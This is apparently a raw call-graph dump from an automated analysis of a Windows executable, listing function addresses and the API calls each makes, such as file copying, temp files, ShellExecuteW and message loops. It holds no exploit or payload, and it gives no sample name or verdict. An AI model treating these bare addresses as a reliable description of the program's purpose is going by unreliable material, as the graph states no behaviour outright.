97641->97719 97642 f74600 97646 f2a8c7 22 API calls 97642->97646 97642->97652 97645->97652 97646->97652 97648 f2a8c7 22 API calls 97648->97658 97649 f40242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97649->97658 97650 f2fbe3 97650->97652 97654 f74bdc 97650->97654 97660 f2f3ae messages 97650->97660 97651 f2a961 22 API calls 97651->97658 97653 f400a3 29 API calls pre_c_initialization 97653->97658 97720 f9359c 82 API calls __wsopen_s 97654->97720 97656 f74beb 97721 f9359c 82 API calls __wsopen_s 97656->97721 97657 f3fddb 22 API calls 97657->97658 97658->97638 97658->97639 97658->97641 97658->97642 97658->97648 97658->97649 97658->97650 97658->97651 97658->97652 97658->97653 97658->97656 97658->97657 97659 f401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97658->97659 97658->97660 97714 f301e0 235 API calls 2 library calls 97658->97714 97659->97658 97660->97652 97718 f9359c 82 API calls __wsopen_s 97660->97718 97662 f317b0 97661->97662 97663 f31376 97661->97663 97822 f40242 5 API calls __Init_thread_wait 97662->97822 97664 f31390 97663->97664 97665 f76331 97663->97665 97722 f31940 97664->97722 97827 fa709c 235 API calls 97665->97827 97669 f317ba 97671 f317fb 97669->97671 97673 f29cb3 22 API calls 97669->97673 97676 f3182c 97671->97676 97677 f7633d 97671->97677 97672 f31940 9 API calls 97674 f313b6 97672->97674 97680 f317d4 97673->97680 97674->97671 97675 f313ec 97674->97675 97675->97677 97700 f31408 __fread_nolock 97675->97700 97824 f2aceb 23 API calls messages 97676->97824 97828 f9359c 82 API calls __wsopen_s 97677->97828 97823 f401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97680->97823 97681 f31839 97825 f3d217 235 API calls 97681->97825 97683 f7636e 97829 f9359c 82 API calls __wsopen_s 97683->97829 97685 f3152f 97687 f763d1 97685->97687 97688 f3153c 97685->97688 97831 fa5745 54 API calls _wcslen 97687->97831 97690 f31940 9 API calls 97688->97690 97691 f31549 97690->97691 97697 f31940 9 API calls 97691->97697 97707 f315c7 messages 97691->97707 97692 f3fddb 22 API calls 97692->97700 97693 f31872 97826 f3faeb 23 API calls 97693->97826 97694 f3fe0b 22 API calls 97694->97700 97696 f3171d 97696->97658 97704 f31563 97697->97704 97699 f2ec40 235 API calls 97699->97700 97700->97681 97700->97683 97700->97685 97700->97692 97700->97694 97700->97699 97701 f763b2 97700->97701 97700->97707 97830 f9359c 82 API calls __wsopen_s 97701->97830 97703 f31940 9 API calls 97703->97707 97704->97707 97708 f2a8c7 22 API calls 97704->97708 97706 f3167b messages 97706->97696 97821 f3ce17 22 API calls messages 97706->97821 97707->97693 97707->97703 97707->97706 97713 f24f39 68 API calls 97707->97713 97732 f96ef1 97707->97732 97812 fa958b 97707->97812 97815 f8d4ce 97707->97815 97818 fa959f 97707->97818 97832 f9359c 82 API calls __wsopen_s 97707->97832 97708->97707 97713->97707 97714->97658 97715->97630 97716->97635 97717->97652 97718->97652 97719->97652 97720->97656 97721->97652 97723 f31981 97722->97723 97724 f3195d 97722->97724 97833 f40242 5 API calls __Init_thread_wait 97723->97833 97731 f313a0 97724->97731 97835 f40242 5 API calls __Init_thread_wait 97724->97835 97726 f3198b 97726->97724 97834 f401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97726->97834 97728 f38727 97728->97731 97836 f401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97728->97836 97731->97672 97733 f2a961 22 API calls 97732->97733 97734 f96f1d 97733->97734 97735 f2a961 22 API calls 97734->97735 97736 f96f26 97735->97736 97737 f96f3a 97736->97737 98011 f2b567 39 API calls 97736->98011 97837 f27510 97737->97837 97740 f96fbc 97742 f27510 53 API calls 97740->97742 97741 f970bf 97743 f24ecb 94 API calls 97741->97743 97745 f96fc8 97742->97745 97746 f970d0 97743->97746 97744 f96f57 _wcslen 97744->97740 97744->97741 97752 f970e9 97744->97752 97750 f2a8c7 22 API calls 97745->97750 97754 f96fdb 97745->97754 97747 f970e5 97746->97747 97748 f24ecb 94 API calls 97746->97748 97749 f2a961 22 API calls 97747->97749 97747->97752 97748->97747 97751 f9711a 97749->97751 97750->97754 97753 f2a961 22 API calls 97751->97753 97752->97707 97757 f97126 97753->97757 97755 f97027 97754->97755 97758 f97005 97754->97758 97759 f2a8c7 22 API calls 97754->97759 97756 f27510 53 API calls 97755->97756 97761 f97034 97756->97761 97762 f2a961 22 API calls 97757->97762 97760 f233c6 22 API calls 97758->97760 97759->97758 97763 f9700f 97760->97763 97764 f9703d 97761->97764 97765 f97047 97761->97765 97766 f9712f 97762->97766 97767 f27510 53 API calls 97763->97767 97768 f2a8c7 22 API calls 97764->97768 98012 f8e199 GetFileAttributesW 97765->98012 97770 f2a961 22 API calls 97766->97770 97771 f9701b 97767->97771 97768->97765 97773 f97138 97770->97773 97775 f26350 22 API calls 97771->97775 97772 f97050 97776 f24c6d 22 API calls 97772->97776 97779 f97063 97772->97779 97774 f27510 53 API calls 97773->97774 97777 f97145 97774->97777 97775->97755 97776->97779 97860 f2525f 97777->97860 97778 f27510 53 API calls 97781 f970a0 97778->97781 97779->97778 97785 f97069 97779->97785 98013 f8d076 57 API calls 97781->98013 97782 f97166 97784 f24c6d 22 API calls 97782->97784 97786 f97175 97784->97786 97785->97752 97787 f971a9 97786->97787 97788 f24c6d 22 API calls 97786->97788 97789 f2a8c7 22 API calls 97787->97789 97790 f97186 97788->97790 97791 f971ba 97789->97791 97790->97787 97794 f26b57 22 API calls 97790->97794 97792 f26350 22 API calls 97791->97792 97793 f971c8 97792->97793 97795 f26350 22 API calls 97793->97795 97796 f9719b 97794->97796 97797 f971d6 97795->97797 97798 f26b57 22 API calls 97796->97798 97799 f26350 22 API calls 97797->97799 97798->97787 97800 f971e4 97799->97800 97801 f27510 53 API calls 97800->97801 97802 f971f0 97801->97802 97902 f8d7bc 97802->97902 97804 f97201 97805 f8d4ce 4 API calls 97804->97805 97806 f9720b 97805->97806 97807 f27510 53 API calls 97806->97807 97810 f97239 97806->97810 97808 f97229 97807->97808 97956 f92947 97808->97956 97811 f24f39 68 API calls 97810->97811 97811->97752 98041 fa7f59 97812->98041 97814 fa959b 97814->97707 98133 f8dbbe lstrlenW 97815->98133 97819 fa7f59 120 API calls 97818->97819 97820 fa95af 97819->97820 97820->97707 97821->97706 97822->97669 97823->97671 97824->97681 97825->97693 97826->97693 97827->97677 97828->97707 97829->97707 97830->97707 97831->97704 97832->97707 97833->97726 97834->97724 97835->97728 97836->97731 97838 f27522 97837->97838 97839 f27525 97837->97839 97838->97744 97840 f2755b 97839->97840 97841 f2752d 97839->97841 97842 f650f6 97840->97842 97844 f2756d 97840->97844 97851 f6500f 97840->97851 98014 f451c6 26 API calls 97841->98014 98017 f45183 26 API calls 97842->98017 98015 f3fb21 51 API calls 97844->98015 97845 f2753d 97850 f3fddb 22 API calls 97845->97850 97848 f6510e 97848->97848 97852 f27547 97850->97852 97854 f3fe0b 22 API calls 97851->97854 97855 f65088 97851->97855 97853 f29cb3 22 API calls 97852->97853 97853->97838 97857 f65058 97854->97857 98016 f3fb21 51 API calls 97855->98016 97856 f3fddb 22 API calls 97858 f6507f 97856->97858 97857->97856 97859 f29cb3 22 API calls 97858->97859 97859->97855 97861 f2a961 22 API calls 97860->97861 97862 f25275 97861->97862 97863 f2a961 22 API calls 97862->97863 97864 f2527d 97863->97864 97865 f2a961 22 API calls 97864->97865 97866 f25285 97865->97866 97867 f2a961 22 API calls 97866->97867 97868 f2528d 97867->97868 97869 f63df5 97868->97869 97870 f252c1 97868->97870 97871 f2a8c7 22 API calls 97869->97871 97872 f26d25 22 API calls 97870->97872 97873 f63dfe 97871->97873 97874 f252cf 97872->97874 97875 f2a6c3 22 API calls 97873->97875 97876 f293b2 22 API calls 97874->97876 97878 f25304 97875->97878 97877 f252d9 97876->97877 97877->97878 97879 f26d25 22 API calls 97877->97879 97880 f25325 97878->97880 97894 f25349 97878->97894 97900 f63e20 97878->97900 97882 f252fa 97879->97882 97885 f24c6d 22 API calls 97880->97885 97880->97894 97884 f293b2 22 API calls 97882->97884 97883 f2535a 97887 f25370 97883->97887 97891 f2a8c7 22 API calls 97883->97891 97884->97878 97890 f25332 97885->97890 97886 f26b57 22 API calls 97898 f63ee0 97886->97898 97888 f25384 97887->97888 97892 f2a8c7 22 API calls 97887->97892 97889 f2538f 97888->97889 97895 f2a8c7 22 API calls 97888->97895 97896 f2a8c7 22 API calls 97889->97896 97901 f2539a 97889->97901 97893 f26d25 22 API calls 97890->97893 97890->97894 97891->97887 97892->97888 97893->97894 98018 f26d25 97894->98018 97895->97889 97896->97901 97897 f24c6d 22 API calls 97897->97898 97898->97894 97898->97897 98031 f249bd 22 API calls __fread_nolock 97898->98031 97900->97886 97901->97782 97903 f8d7d8 97902->97903 97904 f8d7dd 97903->97904 97905 f8d7f3 97903->97905 97906 f8d7ee 97904->97906 97908 f2a8c7 22 API calls 97904->97908 97907 f2a961 22 API calls 97905->97907 97906->97804 97909 f8d7fb 97907->97909 97908->97906 97910 f2a961 22 API calls 97909->97910 97911 f8d803 97910->97911 97912 f2a961 22 API calls 97911->97912 97913 f8d80e 97912->97913 97914 f2a961 22 API calls 97913->97914 97915 f8d816 97914->97915 97916 f2a961 22 API calls 97915->97916 97917 f8d81e 97916->97917 97918 f2a961 22 API calls 97917->97918 97919 f8d826 97918->97919 97920 f2a961 22 API calls 97919->97920 97921 f8d82e 97920->97921 97922 f2a961 22 API calls 97921->97922 97923 f8d836 97922->97923 97924 f2525f 22 API calls 97923->97924 97925 f8d84d 97924->97925 97926 f2525f 22 API calls 97925->97926 97927 f8d866 97926->97927 97928 f24c6d 22 API calls 97927->97928 97929 f8d872 97928->97929 97930 f8d885 97929->97930 97931 f293b2 22 API calls 97929->97931 97932 f24c6d 22 API calls 97930->97932 97931->97930 97933 f8d88e 97932->97933 97934 f8d89e 97933->97934 97935 f293b2 22 API calls 97933->97935 97936 f8d8b0 97934->97936 97937 f2a8c7 22 API calls 97934->97937 97935->97934 97938 f26350 22 API calls 97936->97938 97937->97936 97939 f8d8bb 97938->97939 98033 f8d978 22 API calls 97939->98033 97941 f8d8ca 98034 f8d978 22 API calls 97941->98034 97943 f8d8dd 97944 f24c6d 22 API calls 97943->97944 97945 f8d8e7 97944->97945 97946 f8d8ec 97945->97946 97947 f8d8fe 97945->97947 97949 f233c6 22 API calls 97946->97949 97948 f24c6d 22 API calls 97947->97948 97950 f8d907 97948->97950 97951 f8d8f9 97949->97951 97952 f8d925 97950->97952 97953 f233c6 22 API calls 97950->97953 97954 f26350 22 API calls 97951->97954 97955 f26350 22 API calls 97952->97955 97953->97951 97954->97952 97955->97906 97957 f92954 __wsopen_s 97956->97957 97958 f3fe0b 22 API calls 97957->97958 97959 f92971 97958->97959 97960 f25722 22 API calls 97959->97960 97961 f9297b 97960->97961 97962 f9274e 27 API calls 97961->97962 97963 f92986 97962->97963 97964 f2511f 64 API calls 97963->97964 97965 f9299b 97964->97965 97966 f92a6c 97965->97966 97967 f929bf 97965->97967 97968 f92e66 75 API calls 97966->97968 97969 f92e66 75 API calls 97967->97969 97985 f92a38 97968->97985 97970 f929c4 97969->97970 97977 f92a75 messages 97970->97977 98039 f4d583 26 API calls 97970->98039 97972 f250f5 40 API calls 97973 f92a91 97972->97973 97974 f250f5 40 API calls 97973->97974 97976 f92aa1 97974->97976 97975 f929ed 98040 f4d583 26 API calls 97975->98040 97978 f250f5 40 API calls 97976->97978 97977->97810 97980 f92abc 97978->97980 97981 f250f5 40 API calls 97980->97981 97982 f92acc 97981->97982 97983 f250f5 40 API calls 97982->97983 97984 f92ae7 97983->97984 97986 f250f5 40 API calls 97984->97986 97985->97972 97985->97977 97987 f92af7 97986->97987 97988 f250f5 40 API calls 97987->97988 97989 f92b07 97988->97989 97990 f250f5 40 API calls 97989->97990 97991 f92b17 97990->97991 98035 f93017 GetTempPathW GetTempFileNameW 97991->98035 97993 f92b22 97994 f4e5eb 29 API calls 97993->97994 98005 f92b33 97994->98005 97995 f92bed 97996 f4e678 67 API calls 97995->97996 97997 f92bf8 97996->97997 97999 f92bfe DeleteFileW 97997->97999 98000 f92c12 97997->98000 97998 f250f5 40 API calls 97998->98005 97999->97977 98001 f92c91 CopyFileW 98000->98001 98007 f92c18 98000->98007 98002 f92cb9 DeleteFileW 98001->98002 98003 f92ca7 DeleteFileW 98001->98003 98036 f92fd8 CreateFileW 98002->98036 98003->97977 98005->97977 98005->97995 98005->97998 98006 f4dbb3 65 API calls 98005->98006 98006->98005 98008 f922ce 79 API calls 98007->98008 98009 f92c7c 98008->98009 98009->98002 98010 f92c80 DeleteFileW 98009->98010 98010->97977 98011->97737 98012->97772 98013->97785 98014->97845 98015->97845 98016->97842 98017->97848 98019 f26d91 98018->98019 98020 f26d34 98018->98020 98021 f293b2 22 API calls 98019->98021 98020->98019 98022 f26d3f 98020->98022 98028 f26d62 __fread_nolock 98021->98028 98023 f26d5a 98022->98023 98024 f64c9d 98022->98024 98032 f26f34 22 API calls 98023->98032 98025 f3fddb 22 API calls 98024->98025 98027 f64ca7 98025->98027 98029 f3fe0b 22 API calls 98027->98029 98028->97883 98030 f64cda 98029->98030 98031->97898 98032->98028 98033->97941 98034->97943 98035->97993 98037 f92fff SetFileTime CloseHandle 98036->98037 98038 f93013 98036->98038 98037->98038 98038->97977 98039->97975 98040->97985 98042 f27510 53 API calls 98041->98042 98043 fa7f90 98042->98043 98061 fa7fd5 messages 98043->98061 98079 fa8cd3 98043->98079 98045 fa8281 98046 fa844f 98045->98046 98051 fa828f 98045->98051 98120 fa8ee4 60 API calls 98046->98120 98049 fa845e 98050 fa846a 98049->98050 98049->98051 98050->98061 98092 fa7e86 98051->98092 98052 f27510 53 API calls 98058 fa8049 98052->98058 98057 fa82c8 98107 f3fc70 98057->98107 98058->98045 98058->98052 98058->98061 98111 f8417d 22 API calls __fread_nolock 98058->98111 98112 fa851d 42 API calls _strftime 98058->98112 98061->97814 98062 fa82e8 98113 f9359c 82 API calls __wsopen_s 98062->98113 98063 fa8302 98114 f263eb 22 API calls 98063->98114 98066 fa8311 98115 f26a50 22 API calls 98066->98115 98067 fa82f3 GetCurrentProcess TerminateProcess 98067->98063 98069 fa832a 98078 fa8352 98069->98078 98116 f304f0 22 API calls 98069->98116 98071 fa84c5 98071->98061 98073 fa84d9 FreeLibrary 98071->98073 98072 fa8341 98117 fa8b7b 75 API calls 98072->98117 98073->98061 98078->98071 98118 f304f0 22 API calls 98078->98118 98119 f2aceb 23 API calls messages 98078->98119 98121 fa8b7b 75 API calls 98078->98121 98080 f2aec9 22 API calls 98079->98080 98081 fa8cee CharLowerBuffW 98080->98081 98122 f88e54 98081->98122 98085 f2a961 22 API calls 98087 fa8d2a 98085->98087 98086 fa8e5e _wcslen 98086->98058 98088 f26d25 22 API calls 98087->98088 98089 fa8d3e 98088->98089 98090 f293b2 22 API calls 98089->98090 98091 fa8d48 _wcslen 98090->98091 98091->98086 98129 fa851d 42 API calls _strftime 98091->98129 98093 fa7eec 98092->98093 98094 fa7ea1 98092->98094 98098 fa9096 98093->98098 98095 f3fe0b 22 API calls 98094->98095 98096 fa7ec3 98095->98096 98096->98093 98097 f3fddb 22 API calls 98096->98097 98097->98096 98099 fa92ab messages 98098->98099 98106 fa90ba _strcat _wcslen 98098->98106 98099->98057 98100 f2b6b5 39 API calls 98100->98106 98101 f2b567 39 API calls 98101->98106 98102 f2b38f 39 API calls 98102->98106 98103 f27510 53 API calls 98103->98106 98104 f4ea0c 21 API calls ___std_exception_copy 98104->98106 98106->98099 98106->98100 98106->98101 98106->98102 98106->98103 98106->98104 98132 f8efae 24 API calls _wcslen 98106->98132 98109 f3fc85 98107->98109 98108 f3fd1d VirtualAlloc 98110 f3fceb 98108->98110 98109->98108 98109->98110 98110->98062 98110->98063 98111->98058 98112->98058 98113->98067 98114->98066 98115->98069 98116->98072 98117->98078 98118->98078 98119->98078 98120->98049 98121->98078 98123 f88e74 _wcslen 98122->98123 98124 f88f63 98123->98124 98126 f88ea9 98123->98126 98128 f88f68 98123->98128 98124->98085 98124->98091 98126->98124 98130 f3ce60 41 API calls 98126->98130 98128->98124 98131 f3ce60 41 API calls 98128->98131 98129->98086 98130->98126 98131->98128 98132->98106 98134 f8dbdc GetFileAttributesW 98133->98134 98135 f8d4d5 98133->98135 98134->98135 98136 f8dbe8 FindFirstFileW 98134->98136 98135->97707 98136->98135 98137 f8dbf9 FindClose 98136->98137 98137->98135 98138 f2dddc 98139 f2b710 235 API calls 98138->98139 98140 f2ddea 98139->98140 98141 f30b9d 98143 f30ba6 __fread_nolock 98141->98143 98142 f27510 53 API calls 98142->98143 98143->98142 98144 f75cb8 98143->98144 98146 f30847 __fread_nolock 98143->98146 98147 f30bf7 98143->98147 98148 f3fddb 22 API calls 98143->98148 98152 f3fe0b 22 API calls 98143->98152 98153 f24a88 22 API calls __fread_nolock 98144->98153 98150 f2a587 22 API calls 98147->98150 98148->98143 98149 f75cc4 98149->98146 98151 f2a8c7 22 API calls 98149->98151 98150->98146 98151->98146 98152->98143 98153->98149 98154 f590fa 98155 f59107 98154->98155 98158 f5911f 98154->98158 98204 f4f2d9 20 API calls _abort 98155->98204 98157 f5910c 98205 f527ec 26 API calls _abort 98157->98205 98162 f5917a 98158->98162 98168 f59117 98158->98168 98206 f5fdc4 21 API calls 2 library calls 98158->98206 98161 f4d955 __fread_nolock 26 API calls 98163 f59192 98161->98163 98162->98161 98174 f58c32 98163->98174 98165 f59199 98166 f4d955 __fread_nolock 26 API calls 98165->98166 98165->98168 98167 f591c5 98166->98167 98167->98168 98169 f4d955 __fread_nolock 26 API calls 98167->98169 98170 f591d3 98169->98170 98170->98168 98171 f4d955 __fread_nolock 26 API calls 98170->98171 98172 f591e3 98171->98172 98173 f4d955 __fread_nolock 26 API calls 98172->98173 98173->98168 98175 f58c3e ___scrt_is_nonwritable_in_current_image 98174->98175 98176 f58c46 98175->98176 98177 f58c5e 98175->98177 98208 f4f2c6 20 API calls _abort 98176->98208 98179 f58d24 98177->98179 98183 f58c97 98177->98183 98215 f4f2c6 20 API calls _abort 98179->98215 98180 f58c4b 98209 f4f2d9 20 API calls _abort 98180->98209 98186 f58ca6 98183->98186 98187 f58cbb 98183->98187 98184 f58d29 98216 f4f2d9 20 API calls _abort 98184->98216 98210 f4f2c6 20 API calls _abort 98186->98210 98207 f55147 EnterCriticalSection 98187->98207 98189 f58cb3 98217 f527ec 26 API calls _abort 98189->98217 98191 f58cc1 98193 f58cf2 98191->98193 98194 f58cdd 98191->98194 98192 f58cab 98211 f4f2d9 20 API calls _abort 98192->98211 98199 f58d45 __fread_nolock 38 API calls 98193->98199 98212 f4f2d9 20 API calls _abort 98194->98212 98196 f58c53 __fread_nolock 98196->98165 98201 f58ced 98199->98201 98200 f58ce2 98213 f4f2c6 20 API calls _abort 98200->98213 98214 f58d1c LeaveCriticalSection __wsopen_s 98201->98214 98204->98157 98205->98168 98206->98162 98207->98191 98208->98180 98209->98196 98210->98192 98211->98189 98212->98200 98213->98201 98214->98196 98215->98184 98216->98189 98217->98196 98218 f403fb 98219 f40407 ___scrt_is_nonwritable_in_current_image 98218->98219 98247 f3feb1 98219->98247 98221 f4040e 98222 f40561 98221->98222 98225 f40438 98221->98225 98274 f4083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 98222->98274 98224 f40568 98275 f44e52 28 API calls _abort 98224->98275 98236 f40477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 98225->98236 98258 f5247d 98225->98258 98227 f4056e 98276 f44e04 28 API calls _abort 98227->98276 98230 f40576 98231 f40457 98234 f404d8 98266 f40959 98234->98266 98236->98234 98270 f44e1a 38 API calls 2 library calls 98236->98270 98238 f404de 98239 f404f3 98238->98239 98271 f40992 GetModuleHandleW 98239->98271 98241 f404fa 98241->98224 98242 f404fe 98241->98242 98243 f40507 98242->98243 98272 f44df5 28 API calls _abort 98242->98272 98273 f40040 13 API calls 2 library calls 98243->98273 98246 f4050f 98246->98231 98248 f3feba 98247->98248 98277 f40698 IsProcessorFeaturePresent 98248->98277 98250 f3fec6 98278 f42c94 10 API calls 3 library calls 98250->98278 98252 f3fecb 98257 f3fecf 98252->98257 98279 f52317 98252->98279 98254 f3fee6 98254->98221 98257->98221 98259 f52494 98258->98259 98260 f40a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98259->98260 98261 f40451 98260->98261 98261->98231 98262 f52421 98261->98262 98263 f52450 98262->98263 98264 f40a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98263->98264 98265 f52479 98264->98265 98265->98236 98330 f42340 98266->98330 98269 f4097f 98269->98238 98270->98234 98271->98241 98272->98243 98273->98246 98274->98224 98275->98227 98276->98230 98277->98250 98278->98252 98283 f5d1f6 98279->98283 98282 f42cbd 8 API calls 3 library calls 98282->98257 98284 f5d213 98283->98284 98287 f5d20f 98283->98287 98284->98287 98289 f54bfb 98284->98289 98285 f40a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98286 f3fed8 98285->98286 98286->98254 98286->98282 98287->98285 98290 f54c07 ___scrt_is_nonwritable_in_current_image 98289->98290 98301 f52f5e EnterCriticalSection 98290->98301 98292 f54c0e 98302 f550af 98292->98302 98294 f54c1d 98295 f54c2c 98294->98295 98315 f54a8f 29 API calls 98294->98315 98317 f54c48 LeaveCriticalSection _abort 98295->98317 98298 f54c3d __fread_nolock 98298->98284 98299 f54c27 98316 f54b45 GetStdHandle GetFileType 98299->98316 98301->98292 98303 f550bb ___scrt_is_nonwritable_in_current_image 98302->98303 98304 f550df 98303->98304 98305 f550c8 98303->98305 98318 f52f5e EnterCriticalSection 98304->98318 98326 f4f2d9 20 API calls _abort 98305->98326 98308 f550cd 98327 f527ec 26 API calls _abort 98308->98327 98310 f55117 98328 f5513e LeaveCriticalSection _abort 98310->98328 98311 f550d7 __fread_nolock 98311->98294 98312 f550eb 98312->98310 98319 f55000 98312->98319 98315->98299 98316->98295 98317->98298 98318->98312 98320 f54c7d _abort 20 API calls 98319->98320 98322 f55012 98320->98322 98321 f5501f 98323 f529c8 _free 20 API calls 98321->98323 98322->98321 98329 f53405 11 API calls 2 library calls 98322->98329 98325 f55071 98323->98325 98325->98312 98326->98308 98327->98311 98328->98311 98329->98322 98331 f4096c GetStartupInfoW 98330->98331 98331->98269 98332 f22de3 98333 f22df0 __wsopen_s 98332->98333 98334 f22e09 98333->98334 98335 f62c2b ___scrt_fastfail 98333->98335 98336 f23aa2 23 API calls 98334->98336 98338 f62c47 GetOpenFileNameW 98335->98338 98337 f22e12 98336->98337 98348 f22da5 98337->98348 98340 f62c96 98338->98340 98341 f26b57 22 API calls 98340->98341 98343 f62cab 98341->98343 98343->98343 98345 f22e27 98366 f244a8 98345->98366 98349 f61f50 __wsopen_s 98348->98349 98350 f22db2 GetLongPathNameW 98349->98350 98351 f26b57 22 API calls 98350->98351 98352 f22dda 98351->98352 98353 f23598 98352->98353 98354 f2a961 22 API calls 98353->98354 98355 f235aa 98354->98355 98356 f23aa2 23 API calls 98355->98356 98357 f235b5 98356->98357 98358 f235c0 98357->98358 98359 f632eb 98357->98359 98360 f2515f 22 API calls 98358->98360 98363 f6330d 98359->98363 98401 f3ce60 41 API calls 98359->98401 98362 f235cc 98360->98362 98395 f235f3 98362->98395 98365 f235df 98365->98345 98367 f24ecb 94 API calls 98366->98367 98368 f244cd 98367->98368 98369 f63833 98368->98369 98371 f24ecb 94 API calls 98368->98371 98370 f92cf9 80 API calls 98369->98370 98372 f63848 98370->98372 98373 f244e1 98371->98373 98375 f6384c 98372->98375 98376 f63869 98372->98376 98373->98369 98374 f244e9 98373->98374 98377 f63854 98374->98377 98378 f244f5 98374->98378 98379 f24f39 68 API calls 98375->98379 98380 f3fe0b 22 API calls 98376->98380 98426 f8da5a 82 API calls 98377->98426 98425 f2940c 136 API calls 2 library calls 98378->98425 98379->98377 98394 f638ae 98380->98394 98383 f22e31 98384 f63862 98384->98376 98385 f24f39 68 API calls 98388 f63a5f 98385->98388 98388->98385 98428 f8989b 82 API calls __wsopen_s 98388->98428 98391 f29cb3 22 API calls 98391->98394 98394->98388 98394->98391 98402 f8967e 98394->98402 98405 f90b5a 98394->98405 98411 f2a4a1 98394->98411 98419 f23ff7 98394->98419 98427 f895ad 42 API calls _wcslen 98394->98427 98396 f23624 __fread_nolock 98395->98396 98397 f23605 98395->98397 98398 f3fddb 22 API calls 98396->98398 98399 f3fe0b 22 API calls 98397->98399 98400 f2363b 98398->98400 98399->98396 98400->98365 98401->98359 98403 f3fe0b 22 API calls 98402->98403 98404 f896ae __fread_nolock 98403->98404 98404->98394 98406 f90b65 98405->98406 98407 f3fddb 22 API calls 98406->98407 98408 f90b7c 98407->98408 98409 f29cb3 22 API calls 98408->98409 98410 f90b87 98409->98410 98410->98394 98412 f2a52b 98411->98412 98418 f2a4b1 __fread_nolock 98411->98418 98414 f3fe0b 22 API calls 98412->98414 98413 f3fddb 22 API calls 98415 f2a4b8 98413->98415 98414->98418 98416 f2a4d6 98415->98416 98417 f3fddb 22 API calls 98415->98417 98416->98394 98417->98416 98418->98413 98420 f2400a 98419->98420 98422 f240ae 98419->98422 98421 f3fe0b 22 API calls 98420->98421 98424 f2403c 98420->98424 98421->98424 98422->98394 98423 f3fddb 22 API calls 98423->98424 98424->98422 98424->98423 98425->98383 98426->98384 98427->98394 98428->98388 98429 f62ba5 98430 f22b25 98429->98430 98431 f62baf 98429->98431 98457 f22b83 7 API calls 98430->98457 98433 f23a5a 24 API calls 98431->98433 98435 f62bb8 98433->98435 98437 f29cb3 22 API calls 98435->98437 98439 f62bc6 98437->98439 98438 f22b2f 98442 f23837 49 API calls 98438->98442 98448 f22b44 98438->98448 98440 f62bf5 98439->98440 98441 f62bce 98439->98441 98444 f233c6 22 API calls 98440->98444 98443 f233c6 22 API calls 98441->98443 98442->98448 98445 f62bd9 98443->98445 98446 f62bf1 GetForegroundWindow ShellExecuteW 98444->98446 98450 f26350 22 API calls 98445->98450 98451 f62c26 98446->98451 98449 f22b5f 98448->98449 98461 f230f2 Shell_NotifyIconW ___scrt_fastfail 98448->98461 98455 f22b66 SetCurrentDirectoryW 98449->98455 98453 f62be7 98450->98453 98451->98449 98454 f233c6 22 API calls 98453->98454 98454->98446 98456 f22b7a 98455->98456 98462 f22cd4 7 API calls 98457->98462 98459 f22b2a 98460 f22c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98459->98460 98460->98438 98461->98449 98462->98459 98463 f21044 98468 f210f3 98463->98468 98465 f2104a 98504 f400a3 29 API calls __onexit 98465->98504 98467 f21054 98505 f21398 98468->98505 98472 f2116a 98473 f2a961 22 API calls 98472->98473 98474 f21174 98473->98474 98475 f2a961 22 API calls 98474->98475 98476 f2117e 98475->98476 98477 f2a961 22 API calls 98476->98477 98478 f21188 98477->98478 98479 f2a961 22 API calls 98478->98479 98480 f211c6 98479->98480 98481 f2a961 22 API calls 98480->98481 98482 f21292 98481->98482 98515 f2171c 98482->98515 98486 f212c4 98487 f2a961 22 API calls 98486->98487 98488 f212ce 98487->98488 98489 f31940 9 API calls 98488->98489 98490 f212f9 98489->98490 98536 f21aab 98490->98536 98492 f21315 98493 f21325 GetStdHandle 98492->98493 98494 f62485 98493->98494 98495 f2137a 98493->98495 98494->98495 98496 f6248e 98494->98496 98499 f21387 OleInitialize 98495->98499 98497 f3fddb 22 API calls 98496->98497 98498 f62495 98497->98498 98543 f9011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 98498->98543 98499->98465 98501 f6249e 98544 f90944 CreateThread 98501->98544 98503 f624aa CloseHandle 98503->98495 98504->98467 98545 f213f1 98505->98545 98508 f213f1 22 API calls 98509 f213d0 98508->98509 98510 f2a961 22 API calls 98509->98510 98511 f213dc 98510->98511 98512 f26b57 22 API calls 98511->98512 98513 f21129 98512->98513 98514 f21bc3 6 API calls 98513->98514 98514->98472 98516 f2a961 22 API calls 98515->98516 98517 f2172c 98516->98517 98518 f2a961 22 API calls 98517->98518 98519 f21734 98518->98519 98520 f2a961 22 API calls 98519->98520 98521 f2174f 98520->98521 98522 f3fddb 22 API calls 98521->98522 98523 f2129c 98522->98523 98524 f21b4a 98523->98524 98525 f21b58 98524->98525 98526 f2a961 22 API calls 98525->98526 98527 f21b63 98526->98527 98528 f2a961 22 API calls 98527->98528 98529 f21b6e 98528->98529 98530 f2a961 22 API calls 98529->98530 98531 f21b79 98530->98531 98532 f2a961 22 API calls 98531->98532 98533 f21b84 98532->98533 98534 f3fddb 22 API calls 98533->98534 98535 f21b96 RegisterWindowMessageW 98534->98535 98535->98486 98537 f21abb 98536->98537 98538 f6272d 98536->98538 98540 f3fddb 22 API calls 98537->98540 98552 f93209 23 API calls 98538->98552 98542 f21ac3 98540->98542 98541 f62738 98542->98492 98543->98501 98544->98503 98553 f9092a 28 API calls 98544->98553 98546 f2a961 22 API calls 98545->98546 98547 f213fc 98546->98547 98548 f2a961 22 API calls 98547->98548 98549 f21404 98548->98549 98550 f2a961 22 API calls 98549->98550 98551 f213c6 98550->98551 98551->98508 98552->98541 98554 f72a00 98569 f2d7b0 messages 98554->98569 98555 f2db11 PeekMessageW 98555->98569 98556 f2d807 GetInputState 98556->98555 98556->98569 98557 f71cbe TranslateAcceleratorW 98557->98569 98559 f2db8f PeekMessageW 98559->98569 98560 f2da04 timeGetTime 98560->98569 98561 f2db73 TranslateMessage DispatchMessageW 